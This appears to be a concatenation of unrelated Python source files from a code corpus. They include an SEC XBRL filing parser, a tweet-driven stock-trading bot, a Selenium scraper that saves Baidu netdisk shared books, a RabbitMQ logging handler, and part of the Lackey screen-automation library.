suffix = "__a" + suffix
return suffix
def return_simple_xbrl_dict(xbrl_tree, namespace, file_name):
tree = xbrl_tree
root = tree.getroot()
ns = namespace
reverse_ns = {v: k for k, v in ns.items()}
# get CIK for stock, else return empty dict
try:
context_tag = tree.find(config.DEFAULT_CONTEXT_TAG, ns)
entity_tag = context_tag.find(config.DEFAULT_ENTITY_TAG, ns)
identifier_tag = entity_tag.find(config.DEFAULT_IDENTIFIER_TAG, ns)
cik = identifier_tag.text
except:
logging.error('CIK could not be found for: {}'.format(file_name))
return None
stock = utils.return_stock_by_cik(cik)
if not stock:
logging.info('No stock for CIK: {}'.format(cik))
return None
# Stock with CIK found, time to save stuff
ticker = stock.ticker
context_element_list = None
for identifier_tag in [config.DEFAULT_IDENTIFIER_TAG,
"xbrli:context",
"context",
]:
try:
context_element_list = tree.findall(identifier_tag, ns)
except:
pass
if context_element_list:
break
if not context_element_list:
logging.info("Improperly formatted XBRL file. Will try to parse with common made errors...")
potential_identifier_tag_list = []
root = tree.getroot()
logging.warning(root.tag)
logging.warning(root.attrib)
for child in root:
if 'context' in child.tag:
if child.tag not in potential_identifier_tag_list:
potential_identifier_tag_list.append(child.tag)
for identifier_tag in potential_identifier_tag_list:
context_element_list = tree.findall(identifier_tag)
if not context_element_list:
logging.error(context_element_list)
logging.error(ns)
logging.error("{} XBRL file could not be parsed...".format(ticker))
sys.exit()
return
xbrl_stock_dict = {ticker: {}}
for element in context_element_list:
period_dict = dict()
dimension = None
dimension_value = None
previous_entry = None
# get period first:
period_element = element.find(config.DEFAULT_PERIOD_TAG)
for item in period_element.iter():
# a lot of these datetimes have leading and trailing \n's
formatted_item = str(item.text).strip().replace("\n", "")
if "T" in formatted_item: # someone put time in the date str
formatted_item = formatted_item.split("T")[0]
if "startDate" in item.tag:
period_dict["startDate"] = formatted_item
elif "endDate" in item.tag:
period_dict["endDate"] = formatted_item
elif "instant" in item.tag:
period_dict["instant"] = formatted_item
elif "forever" in item.tag:
period_dict["forever"] = formatted_item
if not period_dict:
logging.error("No period")
else:
# logging.warning(period_dict)
pass
# datetime YYYY-MM-DD
datetime_delta = None
if period_dict.get("startDate"):
start_date = period_dict.get("startDate")
end_date = period_dict.get("endDate")
if start_date != end_date:
period_serialized = end_date + ":" + start_date
else:
period_serialized = end_date
start_datetime = utils.iso_date_to_datetime(start_date)
end_datetime = utils.iso_date_to_datetime(end_date)
datetime_delta = end_datetime - start_datetime
datetime_to_save = end_datetime
iso_date_to_save = end_date
iso_start_date = start_date
elif period_dict.get("instant"):
instant = period_dict.get("instant")
period_serialized = instant
instant_datetime = utils.iso_date_to_datetime(instant)
datetime_to_save = instant_datetime
iso_date_to_save = instant
elif period_dict.get("forever"):
forever = period_dict.get("forever")
period_serialized = forever
forever_datetime = utils.iso_date_to_datetime(forever)
datetime_to_save = forever_datetime
iso_date_to_save = forever
else:
logging.error("no period_serialized")
period_serialized = None
datetime_to_save = None
context_id = element.get("id")
context_ref_list = [x for x in root if x.get("contextRef") == context_id]
for context_element in context_ref_list:
# these text attributes are a mess, so i ignore them
if "TextBlock" in str(context_element.tag):
continue
elif "<" in str(context_element.text):
continue
elif "<div " in str(context_element.text) and "</div>" in str(context_element.text):
continue
tag = context_element.tag
split_tag = tag.split("}")
if len(split_tag) > 2:
logging.error(split_tag)
institution = reverse_ns.get(split_tag[0][1:])
accounting_item = split_tag[1]
# lots of problems with new lines in this
value = str(context_element.text).strip().replace("\n","")
unitRef = context_element.get("unitRef")
decimals = context_element.get("decimals")
if not xbrl_stock_dict[ticker].get(institution):
xbrl_stock_dict[ticker][institution] = {accounting_item: {period_serialized: {"value": value}}}
elif xbrl_stock_dict[ticker][institution].get(accounting_item) is None:
xbrl_stock_dict[ticker][institution][accounting_item] = {period_serialized: {"value": value}}
else:
xbrl_stock_dict[ticker][institution][accounting_item].update({period_serialized: {"value": value}})
period_dict = xbrl_stock_dict[ticker][institution][accounting_item][period_serialized]
period_dict.update({"datetime": iso_date_to_save})
if datetime_delta:
period_dict.update({"timedeltastart": iso_start_date})
if unitRef:
period_dict.update({"unitRef": unitRef})
if decimals:
period_dict.update({"decimals": decimals})
return(xbrl_stock_dict)
def save_stock_dict(xbrl_stock_dict, file_name):
with db.db.transaction() as connection:
logging.info("Saving data from: {}".format(file_name))
if not xbrl_stock_dict:
logging.error("No xbrl_stock_dict")
return
ticker = list(xbrl_stock_dict.keys())[0] # Note, i use this notation because it's more clear
stock = utils.return_stock_by_symbol(ticker)
if not stock:
logging.info("No stock listed for {}".format(ticker))
return
base_dict = xbrl_stock_dict[ticker]
today = datetime.date.today()
# logging.info("")
# pp.pprint(base_dict)
suffix = return_document_type_suffix(base_dict)
if not suffix:
return
for institution in list(base_dict.keys()):
institution_dict = base_dict[institution]
for accounting_item in list(institution_dict.keys()):
period_dict = institution_dict[accounting_item]
if not type(period_dict) is dict:
period_dict = ast.literal_eval(period_dict)
period_dict_str = return_formatted_xbrl_attribute_ref(ticker, accounting_item, institution, xbrl_dict=True)
period_dict_str_without_suffix = period_dict_str
period_dict_str = period_dict_str + suffix
try:
stock_accounting_item_dict = getattr(stock, period_dict_str)
except:
stock_accounting_item_dict = None
if stock_accounting_item_dict:
if not type(stock_accounting_item_dict) is dict:
stock_accounting_item_dict = ast.literal_eval(stock_accounting_item_dict)
# Here it's important to switch to stock_accounting_item_dict
if stock_accounting_item_dict:
stock_accounting_item_dict.update(period_dict)
db.set_Stock_attribute(stock, period_dict_str_without_suffix, stock_accounting_item_dict, suffix)
else:
db.set_Stock_attribute(stock, period_dict_str_without_suffix, period_dict, suffix)
stock_accounting_item_dict = period_dict
stock_period_dict = getattr(stock, period_dict_str)
if not type(stock_period_dict) is dict:
#logging.warning("trying to convert to dict")
stock_period_dict = ast.literal_eval(stock_period_dict)
if not type(stock_period_dict) is dict:
logging.warning("failure")
pp.pprint(stock_period_dict)
sys.exit()
datetime_fourple_list = [] #[serialize, end dt, start dt, range]
for period in list(stock_period_dict.keys()):
if period == "most_recent":
continue
period_datetime_str = stock_period_dict[period].get("datetime")
period_datetime = utils.iso_date_to_datetime(period_datetime_str)
timedelta_start = stock_period_dict[period].get("timedeltastart")
serialize_index_to_save = period_datetime_str
if timedelta_start:
serialize_index_to_save = str(period_datetime_str) + ":" + str(timedelta_start)
period_endtime_datetime = utils.iso_date_to_datetime(timedelta_start)
datetime_delta = period_datetime - period_endtime_datetime
if datetime_delta >= datetime.timedelta(days=359) and datetime_delta < datetime.timedelta(days=370):
timedelta_range = "year"
elif datetime_delta > datetime.timedelta(days=85) and datetime_delta < datetime.timedelta(days=95):
timedelta_range = "quarter"
elif datetime_delta >= datetime.timedelta(days=27) and datetime_delta <= datetime.timedelta(days=32):
timedelta_range = "month"
else:
timedelta_range = "other"
# logging.warning('"other" length: {} days for {}'.format(datetime_delta.days, accounting_item))
else:
timedelta_range = None
period_endtime_datetime = None
period_and_serialized_fourple = [serialize_index_to_save, period_datetime, period_endtime_datetime, timedelta_range]
datetime_fourple_list.append(period_and_serialized_fourple)
set_of_ranges = set([fourple[3] for fourple in datetime_fourple_list])
youngest_datetime = max(fourple[1] for fourple in datetime_fourple_list if fourple[1])
youngest_fourple_list = [fourple for fourple in datetime_fourple_list if fourple[1] == youngest_datetime]
if len(youngest_fourple_list) > 1:
relevant_list = [fourple for fourple in datetime_fourple_list if fourple[2]]
try:
youngest_start_datetime = max(fourple[2] for fourple in relevant_list if fourple[2])
youngest_start_dt_fourple = [fourple for fourple in relevant_list if fourple[2] == youngest_start_datetime]
youngest = youngest_start_dt_fourple[0]
except:
logging.warning("Accounting item has multiple simultanious, instantanious entries, choosing the first")
youngest = youngest_fourple_list[0]
else:
youngest = youngest_fourple_list[0]
can_be_updated = stock_period_dict.get("most_recent")
if can_be_updated:
can_be_updated.update({time_range: youngest[0]})
else:
stock_period_dict.update({"most_recent": {"period": youngest[0]}})
if len(list(set_of_ranges)) > 1:
for time_range in set_of_ranges:
time_range_list = [fourple for fourple in datetime_fourple_list if fourple[3] == time_range]
try:
youngest_datetime = max(fourple[1] for fourple in time_range_list)
except:
logging.warning(datetime_fourple_list)
logging.warning(accounting_item)
sys.exit()
youngest_datetime_delta = today - youngest_datetime
if youngest_datetime_delta.days > 366:
logging.warning("very old data, over a year old, use most recent period instead")
continue
youngest_fourple_list = [fourple for fourple in time_range_list if fourple[1] == youngest_datetime]
youngest = youngest_fourple_list[0]
can_be_updated = stock_period_dict.get("most_recent")
if can_be_updated:
can_be_updated.update({time_range: youngest[0]})
else:
stock_period_dict.update({"most_recent": {time_range: youngest[0]}})
most_recent_dict = stock_period_dict.get("most_recent")
for time_range in list(most_recent_dict.keys()):
period_index = stock_period_dict["most_recent"][time_range]
value = stock_period_dict[period_index]["value"]
#logging.info(value)
if len(list(most_recent_dict.keys())) > 1:
db.set_Stock_attribute(stock, return_formatted_xbrl_attribute_ref(ticker, accounting_item, institution, period=time_range), value, suffix)
else:
db.set_Stock_attribute(stock, return_formatted_xbrl_attribute_ref(ticker, accounting_item, institution), value, suffix)
db.pack_if_necessary()
def scrape_xbrl_from_file(path_to_zipfile):
filename_to_be_recorded = path_to_zipfile
tree, ns, file_name = return_xbrl_tree_and_namespace(path_to_zipfile = path_to_zipfile)
if [tree, ns, file_name] == [None, None, None]:
return
stock_dict = return_simple_xbrl_dict(tree, ns, file_name)
if not stock_dict:
return
config.SET_OF_FILENAMES_OF_IMPORTED_FILES.add(filename_to_be_recorded)
save_stock_dict(stock_dict, file_name)
logging.info("Success!")
db.save_filenames_imported_files()
def sec_xbrl_download_launcher(year=None, month=None, from_year=None, to_year=None, add_to_wxStocks_database=None, use_wxStocks_cik_list=True):
xbrl_thread = threading.Thread(target=sec_xbrl_download, kwargs={"year":year, "month":month, "from_year":from_year, "to_year":to_year, "add_to_wxStocks_database":add_to_wxStocks_database, "use_wxStocks_cik_list":use_wxStocks_cik_list})
xbrl_thread.start()
def sec_xbrl_download(year=None, month=None, from_year=None, to_year=None, add_to_wxStocks_database=None, use_wxStocks_cik_list=True):
# loadSECfilings.py -y <year> -m <month> | -f <from_year> -t <to_year>
if not ((year and month) or (from_year and to_year)):
logging.error("improper inputs")
return "error"
elif (from_year and to_year) and (from_year > to_year):
logging.error("improper inputs")
return "error"
current_cik_list = None
if use_wxStocks_cik_list:
config.GLOBAL_STOCK_DICT = db.root.Stock
current_cik_list = list(set([getattr(stock, "cik") for stock in config.GLOBAL_STOCK_DICT.values() if hasattr(stock, "cik")]))
current_cik_list = [int(cik) for cik in current_cik_list if cik]
if year and month:
loadSECfilings.main(['-y', str(year), '-m', str(month)], add_to_wxStocks_database = add_to_wxStocks_database, wxStocks_cik_list = current_cik_list)
elif from_year and to_year:
try:
int(from_year)
int(to_year)
except:
logging.error("improper inputs")
return "error"
now = datetime.datetime.now()
this_month = int(now.month)
this_year = int(now.year)
# Not using:
# loadSECfilings.main(['-f', str(from_year), '-t', str(to_year)])
# because in the file, it actually seperates by months anyway
for year in range(int(from_year), int(to_year)+1):
if year == this_year:
last_month = this_month
else:
last_month = 12
for month in reversed(range(1, last_month+1)):
loadSECfilings.main(['-y', str(year), '-m', str(month)], add_to_wxStocks_database = add_to_wxStocks_database, wxStocks_cik_list = current_cik_list)
logging.info("pack data after each month...")
db.pack_db()
db.pack_db()
logging.info("All done!")
################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
#end of line |
main.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from datetime import datetime
from time import sleep
from analysis import Analysis
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer
from logs import Logs
from threading import Event
from threading import Thread
from trading import Trading
from twitter import Twitter
# Whether to send all logs to the cloud instead of a local file.
LOGS_TO_CLOUD = True
# The duration of the smallest backoff step in seconds.
BACKOFF_STEP_S = 0.1
# The maximum number of retry steps, equivalent to 0.1 * (2^12 - 1) = 409.5
# seconds of total delay. This is the largest interval that one backoff
# sequence may take.
MAX_TRIES = 12
# The time in seconds after which to reset a backoff sequence. This is the
# smallest interval at which backoff sequences may repeat normally.
BACKOFF_RESET_S = 30 * 60
# The host for the monitor Web server.
MONITOR_HOST = "0.0.0.0"
# The port for the monitor Web server.
MONITOR_PORT = 80
class Monitor:
"""A monitor exposing a Web server while the main loop is running."""
def __init__(self):
"""Creates a Web server on a background thread."""
self.server = HTTPServer((MONITOR_HOST, MONITOR_PORT),
self.MonitorHandler)
self.thread = Thread(target=self.server.serve_forever)
self.thread.daemon = True
def start(self):
"""Starts the Web server background thread."""
self.thread.start()
def stop(self):
"""Stops the Web server and background thread."""
self.server.shutdown()
self.server.server_close()
class MonitorHandler(BaseHTTPRequestHandler):
"""An HTTP request handler that responds with "OK" while running."""
def _set_headers(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
def do_GET(self):
self._set_headers()
self.wfile.write("OK")
def do_HEAD(self):
self._set_headers()
class Main:
"""A wrapper for the main application logic and retry loop."""
def __init__(self):
self.logs = Logs(name="main", to_cloud=LOGS_TO_CLOUD)
self.twitter = Twitter(logs_to_cloud=LOGS_TO_CLOUD)
def twitter_callback(self, tweet):
"""Analyzes Trump tweets, trades stocks, and tweets about it."""
# Initialize the Analysis, Logs, Trading, and Twitter instances inside
# the callback to create separate httplib2 instances per thread.
analysis = Analysis(logs_to_cloud=LOGS_TO_CLOUD)
logs = Logs(name="main-callback", to_cloud=LOGS_TO_CLOUD)
# Analyze the tweet.
companies = analysis.find_companies(tweet)
logs.info("Using companies: %s" % companies)
if not companies:
return
# Trade stocks.
trading = Trading(logs_to_cloud=LOGS_TO_CLOUD)
trading.make_trades(companies)
# Tweet about it.
twitter = Twitter(logs_to_cloud=LOGS_TO_CLOUD)
twitter.tweet(companies, tweet)
def run_session(self):
"""Runs a single streaming session. Logs and cleans up after
exceptions.
"""
self.logs.info("Starting new session.")
try:
self.twitter.start_streaming(self.twitter_callback)
except:
self.logs.catch()
finally:
self.twitter.stop_streaming()
self.logs.info("Ending session.")
def backoff(self, tries):
"""Sleeps an exponential number of seconds based on the number of
tries.
"""
delay = BACKOFF_STEP_S * pow(2, tries)
self.logs.warn("Waiting for %.1f seconds." % delay)
sleep(delay)
def run(self):
"""Runs the main retry loop with exponential backoff."""
tries = 0
while True:
# The session blocks until an error occurs.
self.run_session()
# Remember the first time a backoff sequence starts.
now = datetime.now()
if tries == 0:
self.logs.debug("Starting first backoff sequence.")
backoff_start = now
# Reset the backoff sequence if the last error was long ago.
if (now - backoff_start).total_seconds() > BACKOFF_RESET_S:
self.logs.debug("Starting new backoff sequence.")
tries = 0
backoff_start = now
# Give up after the maximum number of tries.
if tries >= MAX_TRIES:
self.logs.warn("Exceeded maximum retry count.")
break
# Wait according to the progression of the backoff sequence.
self.backoff(tries)
# Increment the number of tries for the next error.
tries += 1
if __name__ == "__main__":
monitor = Monitor()
monitor.start()
try:
Main().run()
finally:
monitor.stop()
|
download.py |
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException, TimeoutException
import time
import json
import re
# import sys
# sys.path.append('/remote-home/my/Projects/pycloud')
from pycloud.netdisk import NetDisk
from multiprocessing import Process, Queue
book_lists_queue = Queue()
with open('demo/d4j/book_lists.json', 'r') as f:
book_lists = json.load(f)
for book_list in book_lists:
book_lists_queue.put(book_list)
share_url_pool = set()
def save_d4j(queue, url_pool):
nd = NetDisk()
nd.login_with_cookie()
while True:
if queue.empty():
return
else:
url, path = queue.get()
try:
try:
nd.driver.get(url)
WebDriverWait(driver=nd.driver, timeout=60, poll_frequency=0.5).until(
expected_conditions.presence_of_element_located((By.XPATH, "//div")))
except TimeoutException:
continue
time.sleep(2)
hrefs = [element.get_attribute('href') for element in nd.driver.find_elements_by_xpath(
"//article//h2[@class='kratos-entry-title-new']//a")]
for href in hrefs:
try:
nd.driver.get(href)
WebDriverWait(driver=nd.driver, timeout=60, poll_frequency=0.5).until(
expected_conditions.presence_of_element_located((By.XPATH, "//div")))
except TimeoutException:
continue
time.sleep(2)
try:
extra_link = nd.driver.find_element_by_class_name('downbtn').get_attribute('href')
except NoSuchElementException:
continue
share_url, vc = None, None
if extra_link.startswith('https://pan.baidu.com'):
share_url = extra_link
try:
vc = re.findall(r'提取码[::]\s+([a-zA-Z0-9]{4})', nd.driver.page_source)[0]
except Exception as e:
print(e)
else:
try:
nd.driver.get(extra_link)
WebDriverWait(driver=nd.driver, timeout=60, poll_frequency=0.5).until(
expected_conditions.presence_of_element_located((By.XPATH, "//div")))
except TimeoutException:
continue
for element in nd.driver.find_elements_by_xpath("//div[@class='plus_l']//li"):
if '百度网盘提取码 :' in element.text:
vc = element.text.replace('百度网盘提取码 :', '').strip()
share_url = nd.driver.find_element_by_xpath("//div[@class='panel-body']/span/a").get_attribute('href')
if share_url and vc and share_url not in url_pool:
print(f'百度网盘链接: {share_url}, 验证码: {vc}')
nd.save(url=share_url, pwd=vc, verbose=False, save_path='Book/' + path)
share_url_pool.add(share_url)
except Exception as e:
print(e)
start = time.time()
num_workers = 8
processes = []
for _ in range(num_workers):
processes.append(Process(target=save_d4j, args=(book_lists_queue, share_url_pool)))
for p in processes:
p.start()
time.sleep(120)
for p in processes:
p.join()
end = time.time()
print(f'done. {round(end - start, 4)} seconds used.')
|
loggingconsole.py | """
@copyright: 2013 Single D Software - All Rights Reserved
@summary: Debugging console interface for Light Maestro.
"""
# Standard library imports
import logging
import threading
import time
# Application imports
import console
# Named logger for this module
_logger = logging.getLogger(__name__)
class LoggingConsole(console.Console):
"""Provide a generic console class that's useful for debugging."""
def _channellogger(self):
while True:
time.sleep(self._polldelay)
values = (v for c, v in self._channels.items() if int(c) <= self._maxchannels)
valuesstr = ' '.join('{0:5.1f}'.format(v) for v in values)
_logger.info(valuesstr)
def __init__(self, paramstring):
params = paramstring.split(',')
self._maxchannels = int(params[0])
self._polldelay = 1.0 / float(params[1])
super().__init__()
threading.Thread(target=self._channellogger).start()
|
handlers_oneway.py | # -*- coding: utf-8 -*-
import logging
import threading
from copy import copy
import pika
from pika import credentials
from .compat import Queue
from .filters import FieldFilter
from .formatters import JSONFormatter
from .compat import ExceptionReporter
class RabbitMQHandlerOneWay(logging.Handler):
"""
Python/Django logging handler to ship logs to RabbitMQ.
Inspired by: https://github.com/ziXiong/MQHandler
"""
def __init__(self, level=logging.NOTSET, formatter=None,
host='localhost', port=5672, connection_params=None,
username=None, password=None,
exchange='log', declare_exchange=False,
routing_key_format="{name}.{level}",
routing_key_formatter=None,
close_after_emit=False,
fields=None, fields_under_root=True, message_headers=None,
record_fields=None, exclude_record_fields=None,
heartbeat=60):
# Initialize the handler.
#
# :param level: Logs level.
# :param formatter: Use custom formatter for the logs.
# :param host: RabbitMQ host. Default localhost
# :param port: RabbitMQ Port. Default 5672
# :param connection_params: Allow extra params to connect with RabbitMQ.
# :param message_headers: A dictionary of headers to be published with the message. Optional.
# :param username: Username in case of authentication.
# :param password: Password for the username.
# :param exchange: Send logs using this exchange.
# :param declare_exchange: Whether or not to declare the exchange.
# :param routing_key_format: Customize how messages will be routed to the queues.
# :param routing_key_formatter: Override how messages will be routed to the queues.
# Formatter is passed record object.
# :param close_after_emit: Close connection after emit the record?
# :param fields: Send these fields as part of all logs.
# :param fields_under_root: Merge the fields in the root object.
# :record_fields: A set of attributes that should be preserved from the record object.
# :exclude_record_fields: A set of attributes that should be ignored from the record object.
# :heartbeat: Lower bound for heartbeat timeout.
super(RabbitMQHandlerOneWay, self).__init__(level=level)
# Important instances/properties.
self.exchange = exchange
self.connection = None
self.channel = None
self.exchange_declared = not declare_exchange
self.routing_key_format = routing_key_format
self.close_after_emit = close_after_emit
# Connection parameters.
# Allow extra params when connect to RabbitMQ.
# @see: http://pika.readthedocs.io/en/0.10.0/modules/parameters.html#pika.connection.ConnectionParameters
conn_params = connection_params if isinstance(connection_params, dict) else {}
self.connection_params = conn_params.copy()
self.connection_params.update(dict(host=host, port=port, heartbeat=heartbeat, blocked_connection_timeout=150))
if username and password:
self.connection_params['credentials'] = credentials.PlainCredentials(username, password)
# Extra params for message publication
self.message_headers = message_headers
# Save routing-key formatter.
self.routing_key_formatter = routing_key_formatter
# Logging.
self.formatter = formatter or JSONFormatter(
include=record_fields,
exclude=exclude_record_fields
)
self.fields = fields if isinstance(fields, dict) else {}
self.fields_under_root = fields_under_root
if len(self.fields) > 0:
self.addFilter(FieldFilter(self.fields, self.fields_under_root))
# Connect.
self.createLock()
# message queue
self.queue = Queue()
self.start_message_worker()
def open_connection(self):
"""
Connect to RabbitMQ.
"""
# Set logger for pika.
# See if something went wrong connecting to RabbitMQ.
if not self.connection or self.connection.is_closed or not self.channel or self.channel.is_closed:
handler = logging.StreamHandler()
handler.setFormatter(self.formatter)
rabbitmq_logger = logging.getLogger('pika')
rabbitmq_logger.addHandler(handler)
rabbitmq_logger.propagate = False
rabbitmq_logger.setLevel(logging.WARNING)
# Connect.
if not self.connection or self.connection.is_closed:
self.connection = pika.BlockingConnection(pika.ConnectionParameters(**self.connection_params))
if not self.channel or self.channel.is_closed:
self.channel = self.connection.channel()
if self.exchange_declared is False:
self.channel.exchange_declare(exchange=self.exchange, exchange_type='topic', durable=True, auto_delete=False)
self.exchange_declared = True
# Manually remove logger to avoid shutdown message.
rabbitmq_logger.removeHandler(handler)
def close_connection(self):
"""
Close active connection.
"""
if self.channel:
self.channel.close()
if self.connection:
self.connection.close()
self.connection, self.channel = None, None
def start_message_worker(self):
worker = threading.Thread(target=self.message_worker)
worker.setDaemon(True)
worker.start()
def message_worker(self):
while 1:
try:
record, routing_key = self.queue.get()
if not self.connection or self.connection.is_closed or not self.channel or self.channel.is_closed:
self.open_connection()
self.channel.basic_publish(
exchange=self.exchange,
routing_key=routing_key,
body=record,
properties=pika.BasicProperties(
delivery_mode=2,
headers=self.message_headers
)
)
except Exception:
self.channel, self.connection = None, None
self.handleError(record)
finally:
self.queue.task_done()
if self.close_after_emit:
self.close_connection()
def emit(self, record):
try:
if self.routing_key_formatter:
routing_key = self.routing_key_formatter(record)
else:
routing_key = self.routing_key_format.format(
name=record.name,
level=record.levelname
)
if hasattr(record, 'request'):
no_exc_record = copy(record)
del no_exc_record.exc_info
del no_exc_record.exc_text
del no_exc_record.request
if record.exc_info:
exc_info = record.exc_info
else:
exc_info = (None, record.getMessage(), None)
if ExceptionReporter:
reporter = ExceptionReporter(record.request, is_email=False, *exc_info)
no_exc_record.traceback = reporter.get_traceback_text()
formatted = self.format(no_exc_record)
else:
formatted = self.format(record)
self.queue.put((formatted, routing_key))
except Exception:
self.channel, self.connection = None, None
self.handleError(record)
def close(self):
"""
Free resources.
"""
self.acquire()
try:
self.close_connection()
finally:
self.release()
|
RegionMatching.py | from PIL import Image, ImageTk
from numbers import Number
try:
import Tkinter as tk
import tkMessageBox as tkmb
except ImportError:
import tkinter as tk
import tkinter.messagebox as tkmb
import multiprocessing
import subprocess
import pyperclip
import tempfile
import platform
import numpy
import time
import uuid
import cv2
import sys
import os
import re
from .InputEmulation import Mouse as MouseClass, Keyboard
from .Exceptions import FindFailed, ImageMissing
from .SettingsDebug import Settings, Debug
from .TemplateMatchers import PyramidTemplateMatcher as TemplateMatcher
from .Geometry import Location
if platform.system() == "Windows" or os.environ.get('READTHEDOCS') == 'True':
# Avoid throwing an error if it's just being imported for documentation purposes
from .PlatformManagerWindows import PlatformManagerWindows
PlatformManager = PlatformManagerWindows()
elif platform.system() == "Darwin":
from .PlatformManagerDarwin import PlatformManagerDarwin
PlatformManager = PlatformManagerDarwin()
else:
raise NotImplementedError("Lackey is currently only compatible with Windows and OSX.")
# Python 3 compatibility
try:
basestring
except NameError:
basestring = str
try:
FOREVER = float("inf")
except:
import math
FOREVER = math.inf
# Instantiate input emulation objects
Mouse = MouseClass()
keyboard = Keyboard()
class Pattern(object):
""" Defines a pattern based on a bitmap, similarity, and target offset """
def __init__(self, target=None):
self.path = None
self.similarity = Settings.MinSimilarity
self.offset = Location(0, 0)
self.imagePattern = False
if isinstance(target, Pattern):
self.image = target.getImage()
self.similarity = target.similarity
self.offset = target.offset.offset(0, 0) # Clone Location
self.imagePattern = target.isImagePattern()
elif isinstance(target, basestring):
self.setFilename(target)
elif isinstance(target, numpy.ndarray):
self.setImage(target)
elif target is not None:
raise TypeError("Unrecognized argument for Pattern()")
def similar(self, similarity):
""" Returns a new Pattern with the specified similarity threshold """
pattern = Pattern(self.path)
pattern.similarity = similarity
return pattern
def getSimilar(self):
""" Returns the current minimum similarity """
return self.similarity
def exact(self):
""" Returns a new Pattern with a similarity threshold of 1.0 """
pattern = Pattern(self.path)
pattern.similarity = 1.0
return pattern
def isValid(self):
return (self.image is not None)
def targetOffset(self, dx, dy):
""" Returns a new Pattern with the given target offset """
pattern = Pattern(self.path)
pattern.similarity = self.similarity
pattern.offset = Location(dx, dy)
return pattern
def getFilename(self):
""" Returns the path to this Pattern's bitmap """
return self.path
def setFilename(self, filename):
""" Set the filename of the pattern's image (and load it) """
## Loop through image paths to find the image
found = False
for image_path in sys.path + [Settings.BundlePath, os.getcwd()] + Settings.ImagePaths:
full_path = os.path.join(image_path, filename)
if os.path.exists(full_path):
# Image file not found
found = True
break
## Check if path is valid
if not found:
self.path = filename
print(Settings.ImagePaths)
raise ImageMissing(ImageMissingEvent(pattern=self, event_type="IMAGEMISSING"))
self.path = full_path
self.image = cv2.imread(self.path)
return self
def setImage(self, img):
self.image = img
self.imagePattern = True
return self
def getImage(self):
return self.image
def getTargetOffset(self):
""" Returns the target offset as a Location(dx, dy) """
return self.offset
def isImagePattern(self):
return self.imagePattern
def debugPreview(self, title="Debug"):
""" Loads and displays the image at ``Pattern.path`` """
haystack = Image.open(self.path)
haystack.show()
class Region(object):
def __init__(self, *args):
if len(args) == 4:
x, y, w, h = args
elif len(args) == 1:
if isinstance(args[0], Region):
x, y, w, h = args[0].getTuple()
elif isinstance(args[0], tuple):
x, y, w, h = args[0]
else:
raise TypeError("Unrecognized argument for Region()")
elif len(args) == 5:
# We can safely ignore Sikuli's screen argument, as that's
# checked dynamically by the location of the region
x, y, w, h, screen = args
elif len(args) == 2:
# Minimal point-like region
x, y = args
w = 1
h = 1
else:
raise TypeError("Unrecognized argument(s) for Region()")
self.FOREVER = None
self.setROI(x, y, w, h)
self._lastMatch = None
self._lastMatches = []
self._lastMatchTime = 0
self.autoWaitTimeout = 3.0
# Converts searches per second to actual second interval
self._defaultScanRate = None
self._defaultTypeSpeed = 0.05
self._raster = (0, 0)
self._observer = Observer(self)
self._observeScanRate = None
self._repeatWaitTime = 0.3
self._throwException = True
self._findFailedResponse = "ABORT"
self._findFailedHandler = None
self._highlighter = None
CREATE_X_DIRECTION_LEFT = 0
CREATE_X_DIRECTION_RIGHT = 1
CREATE_Y_DIRECTION_TOP = 0
CREATE_Y_DIRECTION_BOTTOM = 1
@classmethod
def create(cls, *args):
if len(args) == 3 and isinstance(args[0], Location):
return cls(args[0].x, args[0].y, args[1], args[2])
elif len(args) == 5 and isinstance(args[0], Location):
loc, create_x_direction, create_y_direction, w, h = args
if create_x_direction == cls.CREATE_X_DIRECTION_LEFT:
x = loc.x
else:
x = loc.x - w
if create_y_direction == cls.CREATE_Y_DIRECTION_TOP:
y = loc.y
else:
y = loc.y - h
return cls(x, y, w, h)
def setX(self, x):
""" Set the x-coordinate of the upper left-hand corner """
self.x = int(x)
def setY(self, y):
""" Set the y-coordinate of the upper left-hand corner """
self.y = int(y)
def setW(self, w):
""" Set the width of the region """
self.w = max(1, int(w))
def setH(self, h):
""" Set the height of the region """
self.h = max(1, int(h))
def getX(self):
""" Get the x-coordinate of the upper left-hand corner """
return self.x
def getY(self):
""" Get the y-coordinate of the upper left-hand corner """
return self.y
def getW(self):
""" Get the width of the region """
return self.w
def getH(self):
""" Get the height of the region """
return self.h
def getTuple(self):
""" Returns the shape of the region as (x, y, w, h) """
return (self.x, self.y, self.w, self.h)
def setLocation(self, location):
""" Change the upper left-hand corner to a new ``Location``
Doesn't change width or height
"""
if not location or not isinstance(location, Location):
raise ValueError("setLocation expected a Location object")
self.x = location.x
self.y = location.y
return self
moveTo = setLocation
def setROI(self, *args):
""" Set Region of Interest (same as Region.setRect()) """
if len(args) == 4:
x, y, w, h = args
elif len(args) == 1:
if isinstance(args[0], Region):
x, y, w, h = args[0].getTuple()
elif isinstance(args[0], tuple):
x, y, w, h = args[0]
else:
raise TypeError("Unrecognized argument for Region()")
else:
raise TypeError("Unrecognized argument(s) for Region()")
self.setX(x)
self.setY(y)
self.setW(w)
self.setH(h)
setRect = setROI
def contains(self, point_or_region):
""" Checks if ``point_or_region`` is within this region """
if isinstance(point_or_region, Location):
return (self.x < point_or_region.x < self.x + self.w) and (self.y < point_or_region.y < self.y + self.h)
elif isinstance(point_or_region, Region):
return ((self.x < point_or_region.getX() < self.x + self.w) and
(self.y < point_or_region.getY() < self.y + self.h) and
(self.x < point_or_region.getX() + point_or_region.getW() < self.x + self.w) and
(self.y < point_or_region.getY() + point_or_region.getH() < self.y + self.h))
else:
raise TypeError("Unrecognized argument type for contains()")
def containsMouse(self):
return self.contains(Mouse.getPos())
def morphTo(self, region):
""" Change shape of this region to match the given ``Region`` object """
if not region or not isinstance(region, Region):
raise TypeError("morphTo expected a Region object")
self.setROI(region)
return self
def copyTo(self, screen):
if not isinstance(screen, Screen):
# Parameter was screen ID instead of object
screen = Screen(screen)
zero_coord = Location(screen.getX(), screen.getY())
this_screen = self.getScreen()
offset = Location(this_screen.getX() - zero_coord.x, this_screen.getY() - zero_coord.y)
target_coord = zero_coord.offset(offset.x, offset.y)
return Region(self).setLocation(target_coord)
def getCenter(self):
""" Return the ``Location`` of the center of this region """
